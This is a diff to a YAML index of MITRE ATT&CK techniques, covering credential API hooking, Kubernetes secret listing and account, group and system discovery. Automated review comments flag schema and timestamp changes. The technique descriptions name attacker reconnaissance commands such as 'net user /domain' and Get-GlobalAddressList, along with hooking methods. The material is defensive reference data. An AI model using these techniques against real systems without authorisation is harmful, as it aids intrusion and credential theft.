- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -47954,28 +48608,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
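Review bot: the `x_mitre_permissions_required` list (Administrator, SYSTEM) for T1056.004 is removed at the `-` lines with no replacement key in the regenerated block, so any consumer that filters or displays techniques by required privilege silently loses that information; if the field has been dropped from the upstream schema, state that in the commit message, otherwise keep it. The rest of the hunk (type/id/created/external_references moved below x_mitre_data_sources, `spec_version: '2.1'` dropped, attack spec bumped to 3.2.0) is consistent with the other regenerated entries.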
@@ -48032,9 +48752,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -48065,7 +48784,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
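Review bot: the `modified` timestamp for T1556.004 moves backwards, from '2022-05-11T14:00:00.188Z' to '2021-12-14T23:14:26.107Z', and the same backward movement appears on several other entries in this patch (T1613, T1016.001, T1615, T1652, T1120, T1007); anything that sorts or deduplicates techniques by `modified` will now treat these entries as older than before. That is plausible if the regenerated file carries the object's own STIX `modified` value rather than a release date, but the change of meaning should be stated in the PR description.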
@@ -48089,8 +48808,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
@@ -48155,12 +48872,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -48219,7 +48935,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -48240,7 +48955,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -48261,13 +48976,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48290,15 +49003,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
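Review bot: the platform rename at the `-`/`+` lines (Azure AD, Office 365 and Google Workspace replaced by Office Suite and Identity Provider) changes the values that per-platform consumers match on; any index or filter that still looks for the old platform names needs to be updated in the same change, otherwise T1069 drops out of those views. The version bump `'2.5'` → `'2.6'` is consistent with the platform change.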
@@ -48324,13 +49036,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48355,12 +49066,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -48402,13 +49112,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48469,12 +49178,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48538,19 +49246,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
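Review bot: the `-`/`+` pair beginning `utility, dscacheutil -q group` in the T1087.002 description reads identically in the diff, so the difference is whitespace or an invisible character (trailing space, non-breaking space, or markup the renderer strips); confirm the change is intended and not a regeneration artifact that will flip back on the next run.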
@@ -48597,7 +49304,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -48664,12 +49370,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -48759,18 +49464,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -48813,12 +49517,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -48859,12 +49562,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -48949,7 +49651,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49011,12 +49712,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49067,12 +49767,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49083,7 +49782,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49098,7 +49796,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49146,7 +49843,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
@@ -49218,12 +49916,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49265,122 +49962,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
